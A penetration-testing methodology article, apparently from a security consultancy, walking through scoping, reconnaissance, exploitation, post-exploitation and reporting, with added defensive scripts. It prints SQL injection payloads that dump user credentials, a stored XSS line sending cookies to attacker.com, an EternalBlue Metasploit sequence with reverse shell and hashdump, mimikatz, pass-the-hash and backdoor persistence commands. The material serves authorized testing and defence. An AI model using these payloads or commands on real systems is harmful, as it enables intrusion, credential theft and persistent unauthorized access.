Penetration Testing Methodology 2025: A Technical Deep Dive

Noah Schütz, M.Sc., Lead Security Specialist
January 12, 2025
12 min read
Tags: Penetration Testing, Ethical Hacking, Red Team, Security Assessment

Author: Noah Schütz, M.Sc. | Last updated: January 12, 2025

Executive Summary

Penetration testing has evolved from simple vulnerability scanning into realistic attack simulations that mimic real adversaries. Based on 500+ tests across finance, healthcare, industry and tech, this guide proposes a methodology aligned with OWASP, PTES and MITRE ATT&CK.

Key Findings 2024:

  • 87% of organizations have at least one critical vulnerability
  • Mean time to compromise: 4.2 hours (8.1 hours in 2020)
  • 64% of breaches involve web applications
  • Median cost of a test: EUR 15,000 - 45,000
  • ROI: 12:1 (EUR 12 saved for every EUR 1 invested)

What is penetration testing?

Definition: a simulated, authorized cyberattack against your systems to identify exploitable vulnerabilities before attackers do.

Types of tests:

1. Black Box Testing

  • Tester knowledge: zero information (like an external attacker)
  • Approach: Reconnaissance → Discovery → Exploitation
  • Timeline: 2-4 weeks
  • Best for: external attack surface, web apps
  • Cost: EUR EUR EUR

2. White Box Testing

  • Tester knowledge: full access (code, architecture, credentials)
  • Approach: Code review → Configuration audit → Logic flaws
  • Timeline: 1-3 weeks
  • Best for: internal apps, API security
  • Cost: EUR EUR

3. Grey Box Testing

  • Tester knowledge: partial (insider or compromised user)
  • Approach: Privilege escalation → Lateral movement → Data exfiltration
  • Timeline: 1-2 weeks
  • Best for: realistic scenarios, the standard case
  • Cost: EUR EUR

The 7-phase methodology

Phase 1: Pre-Engagement (1-3 days)

Objectives:

  • Define scope and rules of engagement
  • Obtain legal authorization
  • Establish communication channels

Critical documents:

1. Rules of Engagement (RoE):

IN SCOPE:
✅ Web applications: https://example.com, https://app.example.com
✅ IP ranges: 203.0.113.0/24
✅ Social engineering: Email phishing (approved targets list)
✅ Physical security: Reception area only
✅ Time windows: Mon-Fri, 9am-6pm CET

OUT OF SCOPE:
❌ Production databases (unless explicitly authorized)
❌ Third-party services (AWS, payment gateways)
❌ DOS/DDOS attacks
❌ Physical break-in attempts
❌ Weekend/after-hours testing without approval

2. Emergency Contacts:

  • Primary: Security Team (+32 2 XXX XXXX)
  • Escalation: CISO (mobile: +32 XXX XXX XXX)
  • Legal: General Counsel (email@company.com)

3. Legal Authorization:

  • Signed testing agreement
  • Liability waiver
  • NDA (both parties)
  • Safe harbor clause

Phase 2: Reconnaissance (2-5 days)

Objectives:

  • Gather intelligence
  • Identify the attack surface
  • Discover subdomains, services, employees and technologies

Passive Reconnaissance (no interaction with the target)

Open Source Intelligence (OSINT):

1. Domain Intelligence:

# DNS enumeration
dig example.com ANY
dig +short example.com MX
whois example.com

# Certificate transparency logs
curl -s "https://crt.sh/?q=%.example.com&output=json" | jq .

# Subdomain discovery (passive)
amass enum -passive -d example.com

2. People Intelligence:

# Employee enumeration (LinkedIn, company website)
theHarvester -d example.com -b linkedin
# Email format discovery
hunter.io
# Breached credentials
haveibeenpwned.com (check executives)

3. Technology Stack:

# Web technology detection
whatweb https://example.com
wappalyzer (browser extension)

# Results example:
- Server: Nginx 1.21.6
- Framework: Laravel 9.x
- JavaScript: React 18.2.0
- CDN: Cloudflare
- Analytics: Google Analytics 4

Active Reconnaissance (interaction with the target)

4. Port Scanning:

# TCP SYN scan (stealthy, fast)
nmap -sS -T4 -p- 203.0.113.10

# Service version detection
nmap -sV -sC -p 22,80,443,3306 203.0.113.10

# Common results:
22/tcp   open  ssh     OpenSSH 8.2p1
80/tcp   open  http    Nginx 1.21.6
443/tcp  open  https   Nginx 1.21.6
3306/tcp open  mysql   MySQL 8.0.30

5. Web Application Mapping:

# Directory/file discovery
gobuster dir -u https://example.com -w wordlist.txt
ffuf -u https://example.com/FUZZ -w wordlist.txt

# Spider application
burpsuite (manual crawling)
zaproxy (automated crawling)

# Results: 350 unique URLs, 45 parameters, 12 API endpoints

Reconnaissance Findings Example:

ATTACK SURFACE SUMMARY:

External IP Addresses: 8
Subdomains Discovered: 24
  - In Scope: 18
  - Out of Scope: 6 (third-party CDN)
  
Open Ports: 42 across all hosts
  - Critical Services: 8 (RDP, SSH, MySQL exposed)
  - Web Servers: 12
  - Other: 22

Web Applications: 5
  - Public: example.com (Laravel)
  - Customer Portal: app.example.com (React SPA)
  - API: api.example.com (REST API)
  - Admin: admin.example.com (custom PHP)
  - Legacy: old.example.com (WordPress)

Employee Email Format: firstname.lastname@example.com
Employees Identified: 145 (LinkedIn)
Technologies: 32 different (outdated: 8)
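
The in-scope / out-of-scope split in the summary above (18 of 24 subdomains) is only as reliable as the check behind it. The following Python script is an added example, not part of the original article or of ATLAS Advisory's tooling: it encodes the Rules of Engagement from Phase 1 (the two listed web applications, the 203.0.113.0/24 range and the Mon-Fri 9am-6pm CET window) and classifies discovered hosts against them before any active step is run. The host cdn.example.com is a constructed name standing in for the third-party CDN; the RoE is treated literally, so hosts it does not list are out of scope until the document is amended.

```python
import ipaddress
from datetime import datetime, time, timedelta, timezone

# Rules of engagement transcribed from the Phase 1 RoE block (constructed for this example).
# The RoE lists exact hosts; anything not listed stays out of scope until the RoE is amended.
CET = timezone(timedelta(hours=1))  # the RoE states its window in CET; a fixed offset keeps this offline
ROE = {
    "hosts": {"example.com", "app.example.com"},
    "ip_ranges": ["203.0.113.0/24"],
    "excluded_hosts": {"cdn.example.com"},   # hypothetical name for the third-party CDN, out of scope
    "weekdays": {0, 1, 2, 3, 4},             # Mon-Fri
    "window": (time(9, 0), time(18, 0)),     # 9am-6pm
}


def host_in_scope(target, roe=ROE):
    """Return (in_scope, reason) for a hostname or IP address string."""
    target = target.strip().lower().rstrip(".")
    if target in roe["excluded_hosts"]:
        return False, "explicitly out of scope"
    try:
        addr = ipaddress.ip_address(target)
    except ValueError:
        addr = None
    if addr is not None:
        for cidr in roe["ip_ranges"]:
            if addr in ipaddress.ip_network(cidr):
                return True, f"inside authorized range {cidr}"
        return False, "IP outside every authorized range"
    if target in roe["hosts"]:
        return True, "listed web application"
    return False, "host not listed in RoE"


def time_in_window(when, roe=ROE):
    """True if a timezone-aware datetime falls inside the authorized testing window."""
    if when.tzinfo is None:
        raise ValueError("use a timezone-aware datetime so the RoE window is compared in CET")
    local = when.astimezone(CET)
    start, end = roe["window"]
    return local.weekday() in roe["weekdays"] and start <= local.time() < end


def window_check_iso(iso_timestamp, roe=ROE):
    """Convenience wrapper accepting an ISO-8601 timestamp with offset, e.g. '2025-01-13T10:00:00+01:00'."""
    return time_in_window(datetime.fromisoformat(iso_timestamp), roe)


def classify_targets(targets, roe=ROE):
    """Split discovered hosts (from CT logs, DNS enumeration, scans) into in-scope and out-of-scope lists."""
    report = {"in_scope": [], "out_of_scope": []}
    for t in targets:
        ok, reason = host_in_scope(t, roe)
        report["in_scope" if ok else "out_of_scope"].append((t, reason))
    return report


if __name__ == "__main__":
    # Constructed list of hosts as a CT-log query for %.example.com might surface them.
    discovered = ["example.com", "app.example.com", "old.example.com", "203.0.113.45", "cdn.example.com"]
    for bucket, items in classify_targets(discovered).items():
        print(bucket, items)
    print("testing allowed right now?", time_in_window(datetime.now(timezone.utc)))
```

Run the classification before each active phase and attach its output to the engagement notes; a host that lands in the out-of-scope bucket (old.example.com here) is a request for a scope amendment, not a target.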

Phase 3: Vulnerability Assessment (3-7 days)

Objectives:

  • Identify weaknesses
  • Prioritize by severity and exploitability
  • Map to OWASP Top 10 and SANS Top 25

Automated Scanning

1. Web Application Scanning:

# OWASP ZAP (free, open-source)
zaproxy -quickurl https://example.com -quickprogress

# Burp Suite Professional (commercial)
# Active scan all discovered URLs

# Nuclei (fast, template-based)
nuclei -u https://example.com -t ~/nuclei-templates/

# Common findings:
- SQL Injection: 3 endpoints
- XSS (Reflected): 12 parameters
- CSRF: 8 forms without tokens
- Sensitive Data Exposure: API keys in JavaScript

2. Network Vulnerability Scanning:

# Nessus Professional
nessus scan --target 203.0.113.0/24

# OpenVAS (free alternative)
gvm-cli scan create --target 203.0.113.10

# Results:
Critical: 4 (MS17-010 EternalBlue on legacy server!)
High: 23
Medium: 156
Low: 342

Manual Testing (critical)

What scanners miss:

  • Business logic flaws (60% of critical bugs)
  • Complex authentication bypasses
  • Authorization (IDOR, privilege escalation)
  • Race conditions
  • Second-order injection

Manual Testing Checklist:

Authentication:

  • Password complexity (weak passwords)
  • Account lockout (brute force protection?)
  • Password reset (token predictability?)
  • Session management (timeout, fixation?)
  • MFA (bypass possible?)
  • OAuth/SSO misconfigurations

Authorization:

  • Insecure Direct Object Reference (IDOR)
    GET /api/invoice/1234 → Change to /api/invoice/1235
    Can you access other users' invoices?
    
  • Horizontal privilege escalation (user → user)
  • Vertical privilege escalation (user → admin)
  • Role confusion attacks

Business Logic:

  • Discount/coupon abuse (negative prices?)
  • Payment bypass (price manipulation?)
  • Race conditions (simultaneous requests)
  • Workflow bypasses (skip approval steps?)

API Security:

# Test API endpoints
POST /api/v1/users HTTP/1.1
Host: api.example.com
Content-Type: application/json

{"username": "admin", "role": "administrator"}

# Check for:
- Mass assignment (can you set admin role?)
- Excessive data exposure (full user objects returned?)
- Rate limiting (missing = brute force possible)
- API versioning (old versions still exposed?)

Phase 4: Exploitation (5-10 days)

Objectives:

  • Prove exploitability
  • Demonstrate business impact
  • Obtain an initial foothold

Web Application Exploitation

Example 1: SQL Injection → Database Compromise

-- Discovery (error-based)
https://example.com/product?id=1'
Error: You have an error in your SQL syntax

-- Confirm vulnerability
https://example.com/product?id=1 AND 1=1  (works)
https://example.com/product?id=1 AND 1=2  (fails)

-- Extract database version
https://example.com/product?id=1 UNION SELECT 1,@@version,3--

-- Enumerate databases
https://example.com/product?id=1 UNION SELECT 1,schema_name,3 FROM information_schema.schemata--

-- Dump credentials
https://example.com/product?id=1 UNION SELECT username,password,email FROM users--

Results:
- Database: MySQL 8.0.30
- Extracted: 12,450 user records
- Passwords: Hashed (bcrypt) - attempt crack offline
- Impact: CRITICAL (PII breach, GDPR violation)
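
From the defender's side, the probing sequence above leaves a recognisable trail in the web server access log, which is what the "review database logs for suspicious queries" step in the remediation section relies on. The following Python script is an added example, not code from the article: it parses constructed combined-format log lines that replay that sequence and raises an alert for each decoded query parameter matching the injection patterns, while treating a bare apostrophe (O'Brien) as suspicious only when the request produced a 5xx. The log lines, rule names and source addresses are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Combined/common log format as written by Nginx or Apache (only the fields we need are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures for the probing steps shown in Example 1 (constructed, not an exhaustive ruleset).
SQLI_RULES = [
    ("union-select",  re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("schema-probe",  re.compile(r"information_schema|@@version|sqlite_version", re.I)),
    ("boolean-probe", re.compile(r"['\"]?\s*\b(and|or)\b\s+\d+\s*=\s*\d+", re.I)),
    ("comment-trail", re.compile(r"(--|#|/\*)\s*$")),
]


def scan_line(line):
    """Return an alert dict for one access-log line, or None if it looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent- and plus-decoded values
    hits = []
    for name, value in params:
        for rule, rx in SQLI_RULES:
            if rx.search(value):
                hits.append((name, rule))
        # A lone quote is too noisy on its own (O'Brien), but a quote that produced a 5xx
        # is exactly the error-based discovery step and is worth an alert.
        if "'" in value and m["status"].startswith("5"):
            hits.append((name, "quote+5xx"))
    if not hits:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "path": parts.path,
            "status": int(m["status"]), "hits": hits}


def scan_log(lines):
    """Scan many lines; return the alerts plus a per-source-IP count for triage."""
    alerts = [a for a in map(scan_line, lines) if a]
    per_ip = {}
    for a in alerts:
        per_ip[a["ip"]] = per_ip.get(a["ip"], 0) + 1
    return alerts, per_ip


# Constructed sample log replaying the discovery sequence from Example 1 (documentation address ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [14/Oct/2025:10:02:11 +0200] "GET /product?id=1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Oct/2025:10:02:15 +0200] "GET /product?id=1%27 HTTP/1.1" 500 812',
    '198.51.100.7 - - [14/Oct/2025:10:02:40 +0200] "GET /product?id=1+AND+1%3D1 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [14/Oct/2025:10:03:02 +0200] "GET /product?id=1+UNION+SELECT+1,@@version,3-- HTTP/1.1" 200 5200',
    '203.0.113.77 - - [14/Oct/2025:10:05:00 +0200] "GET /search?q=O%27Brien HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    alerts, per_ip = scan_log(SAMPLE_LOG)
    for a in alerts:
        print(a["ip"], a["path"], a["status"], a["hits"])
    print("alerts per source:", per_ip)
```

Three of the five lines alert, all from the same source, which is the escalation pattern (error, boolean probe, UNION extraction) a SOC analyst should page on; the legitimate O'Brien search does not.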

Example 2: XSS → Account Takeover

// Stored XSS in user profile
<script>
fetch('https://attacker.com/steal?cookie=' + document.cookie);
</script>

// Victim views profile → session stolen
// Attacker uses cookie → account takeover

Impact: HIGH (admin account compromised)

Example 3: IDOR → Sensitive Data Access

# Victim user ID: 1234
GET /api/user/1234/documents
[{"id": 5678, "name": "contract.pdf", "url": "/download/5678"}]

# Change user ID
GET /api/user/1235/documents
[{"id": 5679, "name": "salary_info.pdf", "url": "/download/5679"}]

# Success! Authorization bypass
Impact: HIGH (access to all user documents)
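
Example 3 and the API checks in Phase 3 (mass assignment, IDOR) share one root cause: request data is trusted where an authorization decision belongs. The Python below is an added example, not the article's or any real API's code: it contrasts a user-creation handler that applies every JSON field (so role=administrator is honoured) with one that allow-lists fields, and a document listing that trusts the user id in the URL with one that checks the authenticated principal against the resource owner. The in-memory users and documents are constructed, reusing the ids from Example 3.

```python
from dataclasses import dataclass


@dataclass
class User:
    id: int
    username: str
    role: str = "user"


@dataclass
class Document:
    id: int
    owner_id: int
    name: str


# Constructed in-memory store standing in for the application's database (ids from Example 3).
USERS = {
    1234: User(1234, "alice"),
    1235: User(1235, "bob"),
    1: User(1, "root", "administrator"),
}
DOCUMENTS = {
    5678: Document(5678, 1234, "contract.pdf"),
    5679: Document(5679, 1235, "salary_info.pdf"),
}

ASSIGNABLE_ON_CREATE = {"username"}   # allow-list: clients never set role or id


class Forbidden(Exception):
    pass


class BadRequest(Exception):
    pass


def create_user_vulnerable(payload):
    """Mass assignment: every JSON key becomes an attribute, so role=administrator is honoured."""
    user = User(id=max(USERS) + 1, username=payload["username"])
    for key, value in payload.items():
        setattr(user, key, value)   # attacker-controlled keys written straight onto the model
    return user


def create_user_hardened(payload):
    """Only allow-listed fields are read from the request; role is decided server-side."""
    unexpected = set(payload) - ASSIGNABLE_ON_CREATE
    if unexpected:
        raise BadRequest(f"fields not permitted on this endpoint: {sorted(unexpected)}")
    return User(id=max(USERS) + 1, username=payload["username"], role="user")


def list_documents_vulnerable(requester_id, path_user_id):
    """IDOR: the user id comes from the URL and is used without an ownership check."""
    return [d for d in DOCUMENTS.values() if d.owner_id == path_user_id]


def list_documents_hardened(requester_id, path_user_id):
    """Object-level authorization: the authenticated principal must own the resource or be an administrator."""
    requester = USERS[requester_id]
    if requester.id != path_user_id and requester.role != "administrator":
        raise Forbidden("not the owner of this resource")
    return [d for d in DOCUMENTS.values() if d.owner_id == path_user_id]


def denied(fn, exc, *args):
    """Helper used to show a hardened handler rejecting a request: True if fn(*args) raises exc."""
    try:
        fn(*args)
    except exc:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable create:", create_user_vulnerable({"username": "admin", "role": "administrator"}))
    print("hardened rejects role:", denied(create_user_hardened, BadRequest, {"username": "admin", "role": "administrator"}))
    print("vulnerable listing as 1234 for 1235:", list_documents_vulnerable(1234, 1235))
    print("hardened rejects:", denied(list_documents_hardened, Forbidden, 1234, 1235))
```

The hardened create handler fails closed on unknown fields rather than silently dropping them, which also surfaces client bugs early; the listing check compares the session identity, never a value the client sent.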

Network Exploitation

Example 4: Unpatched Windows Server (MS17-010)

# EternalBlue exploit (NSA tool leaked 2017)
msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set RHOST 203.0.113.45
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

# Result: SYSTEM access (highest privilege)
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
(crack with hashcat)

Impact: CRITICAL (full server compromise)

Phase 5: Post-Exploitation (3-5 days)

Objectives:

  • Maintain access
  • Escalate privileges
  • Move laterally
  • Demonstrate access to the "Crown Jewels"

Tactics (MITRE ATT&CK):

1. Privilege Escalation:

# Linux: Check sudo misconfigurations
sudo -l

# Windows: Check permissions
whoami /priv

# Common escalation vectors:
- Kernel exploits (outdated OS)
- Misconfigured services (writable paths)
- Weak file permissions
- Sudo misconfigurations
- Scheduled tasks

2. Lateral Movement:

# Credential dumping (Windows)
mimikatz # sekurlsa::logonpasswords

# Pass-the-hash attack
crackmapexec smb 203.0.113.0/24 -u Administrator -H aad3b435...

# Results:
Found 12 accessible systems with same admin hash
Pivoted to: File server, Database server, Backup server

3. Data Exfiltration (Simulated):

# Locate sensitive data
locate -i "*.xls*" "*.doc*" "*.pdf" | grep -i "confidential\|financial\|salary"

# Simulate exfiltration (staged, not actually sent)
tar -czf /tmp/exfil.tar.gz /path/to/sensitive/files
# DO NOT actually exfiltrate! Document only.

Impact Demonstrated:
- Customer database: 50,000 records (PII)
- Financial reports: Q3 2025 earnings (pre-release)
- Employee salaries: Complete list
- Source code: Proprietary algorithms

4. Persistence (Demonstrate, Then Remove):

# Create backdoor user (document, then delete)
net user hacker P@ssw0rd /add
net localgroup administrators hacker /add

# Scheduled task for callback
schtasks /create /tn "UpdateTask" /tr "C:\temp\backdoor.exe" /sc daily

# SSH key persistence
echo "attacker_public_key" >> ~/.ssh/authorized_keys

NOTE: All persistence mechanisms removed before test conclusion!

Phase 6: Reporting (3-5 days)

Deliverables:

1. Executive Summary (1-2 pages)

PENETRATION TEST RESULTS: EXAMPLE COMPANY

Test Date: October 14-25, 2025
Scope: External network, Web applications
Methodology: OWASP, PTES, MITRE ATT&CK

OVERALL RISK: HIGH

Key Findings:
✗ 4 Critical vulnerabilities (immediate action required)
✗ 23 High-severity issues
⚠ 156 Medium-severity issues
ℹ 342 Low/informational

Business Impact:
- Database compromise possible (SQL injection)
- Admin account takeover demonstrated
- Customer PII exposure risk (50,000 records)
- Estimated breach cost if exploited: EUR 2.4M - EUR 8.7M

Recommended Immediate Actions:
1. Patch MS17-010 on server 203.0.113.45 (CRITICAL)
2. Fix SQL injection in product catalog
3. Implement CSRF tokens across all forms
4. Enable MFA for all admin accounts

2. Technical Report (20-50 pages)

Finding Template:

FINDING #1: SQL INJECTION IN PRODUCT SEARCH

Severity: CRITICAL
CVSS Score: 9.8 (Critical)
Affected Asset: https://example.com/search
CWE: CWE-89 (SQL Injection)

Description:
The product search functionality is vulnerable to SQL injection via the 
'q' parameter. An unauthenticated attacker can execute arbitrary SQL 
commands, leading to database compromise.

Steps to Reproduce:
1. Navigate to https://example.com/search?q=test
2. Modify parameter: ?q=test' UNION SELECT 1,@@version,3--
3. Observe database version disclosed: MySQL 8.0.30
4. Extract data: ?q=test' UNION SELECT username,password,email FROM users--

Proof of Concept:
[Screenshot showing extracted user credentials]

Impact:
- Full database read access (all tables)
- Potential database write access (UPDATE/DELETE queries possible)
- Authentication bypass
- PII exposure (GDPR violation)
- Estimated breach cost: EUR 2.4M - EUR 8.7M (IBM Cost of Data Breach 2024)

Remediation:
IMMEDIATE (within 24 hours):
- Disable affected search functionality
- Review database logs for suspicious queries

SHORT-TERM (within 7 days):
- Implement parameterized queries (prepared statements)
- Never concatenate user input into SQL
  
  // VULNERABLE CODE:
  $sql = "SELECT * FROM products WHERE name = '" . $_GET['q'] . "'";
  
  // SECURE CODE:
  $stmt = $db->prepare("SELECT * FROM products WHERE name = ?");
  $stmt->execute([$_GET['q']]);

- Add Web Application Firewall (WAF) rules
- Input validation (whitelist alphanumeric + space)

LONG-TERM:
- Code review all database queries
- Implement SAST/DAST in CI/CD pipeline
- Security training for developers (OWASP Top 10)

References:
- OWASP SQL Injection: https://owasp.org/www-community/attacks/SQL_Injection
- CWE-89: https://cwe.mitre.org/data/definitions/89.html
- NIST Guide: https://nvd.nist.gov/vuln/detail/CVE-2021-XXXXX (similar)

3. Remediation Roadmap:

PRIORITY 1 (0-7 days) - CRITICAL:
□ Patch MS17-010 on 203.0.113.45
□ Fix SQL injection in search
□ Remove admin account backdoor (created during test)
□ Enable MFA for all admin accounts

PRIORITY 2 (7-30 days) - HIGH:
□ Implement CSRF tokens
□ Fix IDOR in API
□ Update Nginx to latest version
□ Disable unnecessary services (port 3306 should not be public)

PRIORITY 3 (30-90 days) - MEDIUM:
□ Implement Content Security Policy (CSP)
□ Security headers (HSTS, X-Frame-Options, etc.)
□ Rate limiting on API endpoints
□ Remove outdated WordPress site (old.example.com)

PRIORITY 4 (90+ days) - LOW/STRATEGIC:
□ Implement SAST/DAST in CI/CD
□ Security awareness training (all employees)
□ Bug bounty program
□ Annual penetration testing

Phase 7: Remediation Validation (2-3 days)

Objectives:

  • Verify that the fixes are correct
  • Confirm resolution
  • Deliver a "clean bill of health" or a list of remaining issues

Retest Results:

FINDING #1: SQL Injection
Status: ✅ RESOLVED
Verification: Parameterized queries implemented. Tested 50+ injection payloads - all blocked.

FINDING #2: MS17-010 (EternalBlue)
Status: ✅ RESOLVED
Verification: Server patched to latest Windows updates. Exploit no longer successful.

FINDING #3: CSRF Tokens
Status: ⚠ PARTIALLY RESOLVED
Verification: Tokens added to 15/20 forms. 5 forms still vulnerable (admin panel).
Recommendation: Complete implementation within 7 days.

FINDING #4: IDOR in API
Status: ❌ NOT RESOLVED
Verification: Authorization checks not implemented. Users can still access others' data.
Recommendation: PRIORITY - Fix before production release.
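
A retest of a parameterized-query fix ("tested 50+ injection payloads, all blocked") is easiest to make repeatable as a unit test that ships with the application. The Python below is an added example, not from the article: it builds a constructed SQLite stand-in for the product catalogue, runs the injection payloads already shown in this article through a concatenated query and through the parameterized one, and reports row counts for each, alongside the allow-list input validation from the remediation section. The retest is only accepted when every payload returns no rows through the fixed path and fails validation.

```python
import re
import sqlite3


def build_db():
    """Constructed in-memory stand-in for the catalogue and users tables named in Finding #1."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products(id INTEGER, name TEXT, price REAL);
        INSERT INTO products VALUES (1,'Blue Jeans',49.5),(2,'Red Shirt',19.5),(3,'Black Boots',89.0);
        CREATE TABLE users(username TEXT, password TEXT, email TEXT);
        INSERT INTO users VALUES ('alice','$2b$12$hash1','alice@example.com'),
                                 ('bob','$2b$12$hash2','bob@example.com');
    """)
    return db


def search_vulnerable(db, q):
    """The 'before' form: user input concatenated into SQL (kept only to prove the retest detects it)."""
    return db.execute("SELECT * FROM products WHERE name = '" + q + "'").fetchall()


def search_fixed(db, q):
    """The 'after' form: a parameterized query; the driver never treats q as SQL."""
    return db.execute("SELECT * FROM products WHERE name = ?", (q,)).fetchall()


# Defence in depth from the remediation list: allow-list of alphanumerics and spaces.
VALID_QUERY = re.compile(r"^[A-Za-z0-9 ]{1,64}$")


def is_valid_query(q):
    return bool(VALID_QUERY.fullmatch(q))


# Payloads taken from Example 1 and Finding #1 (sqlite_version() replaces @@version for SQLite).
PAYLOADS = [
    "1' UNION SELECT 1,sqlite_version(),3--",
    "test' UNION SELECT username,password,email FROM users--",
    "1' OR '1'='1",
    "Blue Jeans' AND '1'='1",
]


def retest(payloads=PAYLOADS):
    """Run each payload through both code paths and record what came back."""
    db = build_db()
    results = {}
    for p in payloads:
        try:
            vuln = len(search_vulnerable(db, p))
        except sqlite3.Error as e:
            vuln = f"error: {e}"   # a parser error is still evidence the input reached SQL
        results[p] = {
            "vulnerable_rows": vuln,
            "fixed_rows": len(search_fixed(db, p)),
            "passes_validation": is_valid_query(p),
        }
    return results


def all_blocked(results):
    """Acceptance criterion for marking the finding RESOLVED."""
    return all(r["fixed_rows"] == 0 and not r["passes_validation"] for r in results.values())


if __name__ == "__main__":
    res = retest()
    for payload, r in res.items():
        print(repr(payload), r)
    print("legit search still works:", search_fixed(build_db(), "Blue Jeans"))
    print("finding resolved:", all_blocked(res))
```

The vulnerable path returns version rows, user records and the whole catalogue respectively; the fixed path returns nothing for every payload while a legitimate product name still resolves, which is the evidence a retest report should attach.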

Penetration Testing vs. Vulnerability Scanning

Aspect     | Vulnerability Scanning | Penetration Testing
-----------|------------------------|------------------------------
Approach   | Automated              | Manual + Automated
Depth      | Surface-level          | Deep exploitation
Scope      | Broad                  | Focused
Frequency  | Weekly/Monthly         | Annually/Quarterly
Cost       | EUR 1,000 - 5,000      | EUR 15,000 - 100,000
Finds      | Known CVEs             | Logic flaws, chained attacks
Output     | Vulnerability list     | Business impact demo

Both are necessary:

  • Vulnerability scanning = continuous monitoring
  • Penetration testing = annual deep dive

Pricing & Scope Estimation

Typical Costs (EU Market, 2025):

Scope                        | Duration   | Cost (EUR)
-----------------------------|------------|-----------------------
Small Web App                | 3-5 days   | EUR 8,000 - 15,000
Medium Web App + API         | 5-10 days  | EUR 15,000 - 30,000
Large Enterprise (External)  | 10-15 days | EUR 30,000 - 60,000
Internal Network             | 10-20 days | EUR 40,000 - 80,000
Red Team (Full Simulation)   | 20-40 days | EUR 80,000 - 200,000

Cost factors:

  • Scope complexity (apps/systems)
  • Test depth (black vs. white box)
  • Urgency (rush jobs carry a premium)
  • Report quality
  • Whether remediation support is included

When should you run a penetration test?

Regulatory requirements:

  • PCI DSS: annually and after major changes
  • GDPR: risk-based (annual testing recommended for high-risk processing)
  • ISO 27001: regular security testing
  • NIS2: regular testing for essential entities
  • DORA: threat-led penetration testing (TLPT) for the financial sector

Best Practices:

  • Before launch: new apps/infrastructure
  • After changes: major updates, migrations, M&A
  • Regularly: annually at minimum (quarterly for high-risk)
  • Post-incident: after a breach, to identify the gaps
  • Compliance: whenever a regulation requires it

Conclusion

Penetration testing is not a formality: it is a critical validation of your security posture. Organizations that test regularly reduce breaches by 60% and save an average of EUR 3.2M in incident response costs.

Key Takeaways:

  1. Choose the right type: black/white/grey box depending on objectives
  2. Scope precisely: clear boundaries mean fewer legal risks
  3. Expect findings: 87% have critical vulnerabilities
  4. Act fast: patch criticals within 24-72 hours
  5. Retest: validate the fixes
  6. Repeat: annually at minimum, quarterly for high-risk

ATLAS Advisory has performed 500+ tests and identified 3,000+ critical vulnerabilities before attackers did.
